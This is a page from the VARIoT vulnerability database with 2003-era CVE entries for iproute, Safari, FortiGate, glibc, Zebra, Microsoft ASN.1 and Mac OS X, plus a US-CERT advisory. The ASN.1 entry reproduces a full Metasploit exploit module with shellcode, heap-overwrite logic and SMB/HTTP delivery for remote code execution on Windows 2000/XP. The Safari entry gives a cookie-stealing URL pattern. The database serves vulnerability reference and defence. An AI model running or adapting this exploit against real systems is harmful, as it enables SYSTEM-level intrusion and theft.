VARIoT IoT vulnerabilities database


VAR-200312-0223 CVE-2003-0856 Red Hat Linux iproute service disruption (DoS) vulnerability CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface. iproute, as included in Red Hat Linux, does not properly check messages received via the Linux Netlink interface, so forged Netlink messages are accepted; commands in the iproute package may thus be put into a denial of service (DoS) state. A problem has been discovered in iproute when handling messages from the kernel. Because of this, it may be possible for an attacker to deny service to legitimate users of a system. iproute is an advanced IP routing and network device configuration tool. No detailed vulnerability details are currently available
VAR-200312-0239 CVE-2003-0975 Apple Safari web browser null character cookie stealing vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain. An issue has been discovered in Apple Safari which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs. This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL. Apple Safari is the web browser of Apple systems. Remote attackers can exploit this vulnerability by constructing malicious URLs, luring users to visit them, and stealing sensitive cookie information. If the Apple Safari browser loads a URL such as http://alive.znep.com\%00www.passport.com/cgi-bin/cookies, it connects to the host that precedes the "\%00" but sends cookies to that server based on the entire hostname. This problem can be used to steal cookie information for a specific path, and by using a specific path together with SSL in the request URL it can also steal cookies that carry the secure flag
VAR-200311-0047 CVE-2003-0875 OpenSLP slpd script slpd.all_init Symbolic link vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Symbolic link vulnerability in the slpd script slpd.all_init for OpenSLP before 1.0.11 allows local users to overwrite arbitrary files via the route.check temporary file
VAR-200311-0103 No CVE FortiGate Firewall Web Interface Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The FortiGate Firewall is a hardware firewall solution. The web interface included in the FortiGate firewall does not adequately filter URL requests. Remote attackers can exploit this vulnerability for cross-site scripting attacks, which can lead to the disclosure of sensitive information. Multiple scripts on the FortiGate firewall's web interface do not adequately filter URI parameters. If parameters containing malicious script code are submitted and the administrator later views the resulting logs in a browser, the script may execute in that browser and leak the username and the MD5 hash of the password, which can be used to further attack the system. These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser
VAR-200312-0226 CVE-2003-0859 GNU libc getifaddrs() function service disruption (DoS) vulnerability CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. Applications which make use of the kernel Netlink interface are said to be prone to denial of service attacks. It has been reported that applications implementing the getifaddrs() glibc function may be prone to denial of service attacks. The problem is said to occur due to the way getifaddrs() interacts with the netlink device. Under some circumstances, an anonymous netlink message handled by the getifaddrs() function may cause the application to crash. Red Hat has stated that GNU Zebra, Quagga and iproute are also affected by this vulnerability due to the way they interact with the netlink interface; exploitation may result in a denial of service. The precise technical details regarding this issue are currently unknown. This BID will be updated as further information is made available. The kernel Netlink interface is a network interface implementation
VAR-200312-0227 CVE-2003-0795 GNU Zebra service disruption (DoS) vulnerability via undefined telnet connection option CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The vty layer in Quagga before 0.96.4, and Zebra 0.93b and earlier, does not verify that sub-negotiation is taking place when processing the SE marker, which allows remote attackers to cause a denial of service (crash) via a malformed telnet command to the telnet CLI port, which may trigger a null dereference. In GNU Zebra, when a password is set and a telnet connection to the zebra module's management port is established, sending an undefined code that does not exist as a telnet option causes a segmentation violation that crashes the zebra daemon, leaving it in a denial of service (DoS) state. It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. All versions of GNU Zebra are said to be vulnerable to this issue. All versions of Quagga prior to 0.96.4 are also vulnerable
VAR-200403-0051 CVE-2003-0818 Microsoft ASN.1 Library improperly decodes constructed bit strings CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. The Microsoft Windows ASN.1 Library (msasn1.dll) has an integer overflow vulnerability through which a remote third party may execute arbitrary code with SYSTEM privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contains another nested constructed bit string. This vulnerability is exposed in a number of security-related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications which use the library will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates, such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable.
Issues related to this vulnerability were originally covered in BID 9626 and 9743; further information has since identified this as a distinct vulnerability in the library, so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap-based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
      'Description'    => %q{
        This is an exploit for a previously undisclosed vulnerability
        in the bit string decoding code in the Microsoft ASN.1 library.
        Both vulnerabilities were fixed in the MS04-007 patch.

        You are only allowed one attempt with this vulnerability. If
        the payload fails to execute, the LSASS system service will
        crash and the target system will automatically reboot itself in
        60 seconds. If the payload succeeds, the system will no longer
        be able to process authentication requests, denying all attempts
        to login through SMB or at the console. A reboot is required to
        restore proper functioning of an exploited system.

        This exploit has been successfully tested with the win32/*/reverse_tcp
        payloads, however a few problems were encountered when using the
        equivalent bind payloads. Your mileage may vary.
      },
      'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
      'License'        => GPL_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2003-0818'],
          [ 'OSVDB', '3902' ],
          [ 'BID', '9633'],
          [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
          [ 'MSB', 'MS04-007'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'           => 1024,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
            {
              'Platform' => 'win',
            },
          ],
        ],
      'DisclosureDate' => 'Feb 10 2004',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
      ], self.class)
  end

  # This exploit is too destructive to use during automated exploitation.
  # Better Windows-based exploits exist at this time (Sep 2006)
  def autofilter
    false
  end

  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published
  # as a Metasploit Framework module with his permission. This module is only
  # licensed under GPLv2, keep this in mind if you embed the Framework into
  # a non-GPL application.
  #   -hdm[at]metasploit.com

  def exploit
    # The first stage shellcode fixes the PEB pointer and cleans the heap
    stage0 =
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
      "\x08\x00\xeb\xfe"

    token = spnego_token(stage0, payload.encoded)

    case datastore['PROTO']
    when 'smb'
      exploit_smb(token)
    when 'http'
      exploit_http(token)
    else
      print_status("Invalid application protocol specified, use smb or http")
    end
  end

  def exploit_smb(token)
    connect

    client = Rex::Proto::SMB::Client.new(sock)

    begin
      client.session_request(smb_hostname()) if not datastore['SMBDirect']
      client.negotiate
      client.session_setup_ntlmv2_blob(token)
    rescue => e
      if (e.to_s =~ /error code 0x00050001/)
        print_status("The target system has already been exploited")
      else
        print_status("Error: #{e}")
      end
    end

    handler
    disconnect
  end

  def exploit_http(token)
    connect

    req  = "GET / HTTP/1.0\r\n"
    req << "Host: #{ datastore['RHOST']}\r\n"
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

    sock.put(req)
    res = sock.get_once

    if (res and res =~ /0x80090301/)
      print_status("This server does not support the Negotiate protocol or has already been exploited")
    end

    if (res and res =~ /0x80090304/)
      print_status("This server responded with error code 0x80090304 (wth?)")
    end

    handler
    disconnect
  end

  # Returns an ASN.1 encoded string
  def enc_asn1(str)
    Rex::Proto::SMB::Utils::asn1encode(str)
  end

  # Returns an ASN.1 encoded bit string with 0 unused bits
  def enc_bits(str)
    "\x03" + enc_asn1("\x00" + str)
  end

  # Returns a BER encoded constructed bit string
  def enc_constr(*str_arr)
    "\x23" + enc_asn1(str_arr.join(''))
  end

  # Returns a BER encoded SPNEGO token
  def spnego_token(stage0, stage1)

    if !(stage0 and stage1)
      print_status("Invalid parameters passed to spnego_token")
      return
    end

    if (stage0.length > 1032)
      print_status("The stage 0 shellcode is longer than 1032 bytes")
      return
    end

    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
      print_status("The stage 1 shellcode is too long")
      return
    end

    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.
    fw = "\xf8\x0f\x01\x00" # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB
    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    bitstring =
      enc_constr(
        enc_bits("A" * 1024),
        "\x03\x00",
        enc_constr(
          enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
          enc_constr(
            enc_bits(fw + bk)
          ),
          enc_constr(
            enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
            enc_constr(
              enc_bits("\xeb\x06" + make_nops(6)),
              enc_bits("D" * 1040)
            )
          )
        )
      )

    token =
      "\x60" + enc_asn1(                      # Application Constructed Object
        "\x06\x06\x2b\x06\x01\x05\x05\x02" +  # SPNEGO OID
        "\xa0" + enc_asn1(                    # NegTokenInit (0xa0)
          "\x30" + enc_asn1(
            "\xa1" + enc_asn1(
              bitstring
            )
          )
        )
      )

    return token
  end

end

Multiple Vulnerabilities in Microsoft ASN.1 Library

Original issue date: February 10, 2004
Last revised: --
Source: US-CERT

A complete revision history is at the end of this document.

According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.

Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

Please see Microsoft Security Bulletin MS04-007.

References

* Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324>
* Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108>
* eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
* eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
* Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp>
* Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648>

These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document.

Feedback can be directed to the author, Art Manion.

Copyright 2004 Carnegie Mellon University.

Revision History

February 10, 2004: Initial release
VAR-200312-0216 CVE-2003-0824 Microsoft FrontPage Server Extensions contains denial of service vulnerability in the SmartHTML interpreter CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. This issue could be exploited to deny availability of CPU resources on the system, potentially causing a denial of service condition
VAR-200312-0215 CVE-2003-0822 Microsoft FrontPage Server Extensions contains denial of service vulnerability in the SmartHTML interpreter CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. It is possible to trigger this condition with a chunked-encoded HTTP POST request
VAR-200312-0266 CVE-2003-0913 Apple Mac OS X Terminal unknown unauthorized access vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
Unknown vulnerability in the Terminal application for Mac OS X 10.3 (Client and Server) may allow "unauthorized access". The precise technical details regarding this issue are currently unknown; however, it is believed that a local user may exploit a flaw in Terminal to possibly gain elevated privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available
VAR-200311-0055 CVE-2003-0883 Mac OS X Vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
The System Preferences capability in Mac OS X before 10.3 allows local users to access secure Preference Panes for a short period after an administrator has authenticated to the system. Mac OS X is prone to a local security vulnerability
VAR-200311-0054 CVE-2003-0882 Mac OS X Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Mac OS X before 10.3 initializes the TCP timestamp with a constant number, which allows remote attackers to determine the system's uptime via the ID field in a TCP packet. Mac OS X versions prior to 10.3 initialize TCP timestamps from a constant value
VAR-200311-0053 CVE-2003-0881 Mac OS X Permission leak vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Mail in Mac OS X before 10.3, when configured to use MD5 Challenge Response, uses plaintext authentication if the CRAM-MD5 hashed login fails, which could allow remote attackers to gain privileges by sniffing the password. Mail in versions prior to Mac OS X 10.3 is vulnerable
VAR-200311-0052 CVE-2003-0880 Mac OS X Vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
Unknown vulnerability in Mac OS X before 10.3 allows local users to access Dock functions from behind Screen Effects when Full Keyboard Access is enabled using the Keyboard pane in System Preferences. Mac OS X prior to 10.3 has an unknown vulnerability
VAR-200311-0050 CVE-2003-0878 Mac OS X slpd daemon Vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
slpd daemon in Mac OS X before 10.3 allows local users to overwrite arbitrary files via a symlink attack on a temporary file, a different vulnerability than CVE-2003-0875. The slpd daemon in Mac OS X prior to 10.3 is vulnerable
VAR-200403-0085 CVE-2003-1011 MacOS X local root User privilege escalation vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Apple Mac OS X 10.0 through 10.2.8 allows local users with a USB keyboard to gain unauthorized access by holding down the CTRL and C keys when the system is booting, which crashes the init process and leaves the user in a root shell. It has been reported that an attacker with a specific hardware configuration may be capable of gaining root privileges on MacOS X. The problem is said to occur when a user on a system with a USB keyboard holds a specific key sequence down for an unspecified length of time. This is said to effectively crash the init process and drop the user into a shell with root privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system
VAR-200311-0057 CVE-2003-0895 MacOS X Extra long Argv Value Kernel Buffer Overflow Vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
Buffer overflow in the Mac OS X kernel 10.2.8 and earlier allows local users, and possibly remote attackers, to cause a denial of service (crash), access portions of memory, and possibly execute arbitrary code via a long command line argument (argv[]). A buffer overrun has been discovered in the MacOS X kernel when handling large argv values passed via the command line. The precise details regarding this condition are currently unknown; however, the problem likely occurs due to insufficient bounds checking when handling user-supplied data. It has been confirmed that this condition can be exploited to cause a target kernel to crash. Mac OS X is an operating system used on Mac machines, based on the BSD system. By specifying extremely long command-line arguments, a local attacker could cause a Mac OS X kernel panic. The total argument length that triggers this condition falls within a small range. When this problem occurs, the operating system crashes immediately, not allowing the user to perform any operations. No logs are produced, nor are there any kernel panic messages. The system automatically restarts after a few minutes. This vulnerability can also be used to dump a small amount of kernel memory to the attacker, but according to @stake's investigation only memory addresses are returned to the user, and these generally do not contain sensitive information
VAR-200311-0044 CVE-2003-0871 Apple Mac OS X 10.3 unknown Apple Quicktime Java Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Unknown vulnerability in QuickTime Java in Mac OS X v10.3 and Mac OS X Server 10.3 allows attackers to gain "unauthorized access to a system". No detailed vulnerability details are currently available
VAR-200311-0048 CVE-2003-0876 Apple Mac OS X Unsafe file permissions vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Finder in Mac OS X 10.2.8 and earlier sets global read/write/execute permissions on directories when they are dragged (copied) from a mounted volume such as a disk image (DMG), which could cause the directories to have less restrictive permissions than intended. These issues may cumulatively allow an attacker to cause denial of service, arbitrary code execution, privilege escalation and unauthorized access. There are multiple instances in Apple Mac OS X where files are installed or created with insecure or inappropriate permissions. This could permit local attackers to modify sensitive files or potentially even replace binaries, which could then be executed by another user. Mac OS X is an operating system used on Mac machines, based on the BSD system. The same happens when dragging a folder into a mounted DMG. This reset only occurs on directories, not on file permissions. Because these directories contain applications, an attacker can overwrite any application with a Trojan horse; when it is executed by other high-privilege users, this leads to privilege escalation. World-writable files include:
- Application and supporting executables
- Directories
- Shared objects
- Configuration files
- HTML and JavaScript
These files mostly exist in the following directories:
- /Applications
- /Library/Application Support
- /Library/StartupItems
VAR-200311-0049 CVE-2003-0877 Apple Mac OS X Core File Symbolic Link Vulnerability CVSS V2: 4.6
CVSS V3: -
Severity: MEDIUM
Mac OS X before 10.3 with core files enabled allows local users to overwrite arbitrary files and read core files via a symlink attack on core files that are created with predictable names in the /cores directory. Because of this, a local attacker may be able to overwrite arbitrary root-owned files. Apple Mac OS X 10.3 (Panther) has been released to address multiple new and previously known vulnerabilities. These issues may cumulatively allow an attacker to cause denial of service, arbitrary code execution, privilege escalation and unauthorized access. The name of the core file is core.PID (where PID is the process ID), the owner of this file is root, and its permissions are 0400. Since /cores is world-writable by default and the name of the core file is predictable, an attacker can create a symbolic link pointing to an important system file. When an application generates a core file, the system file is overwritten, which may elevate privileges or cause a denial of service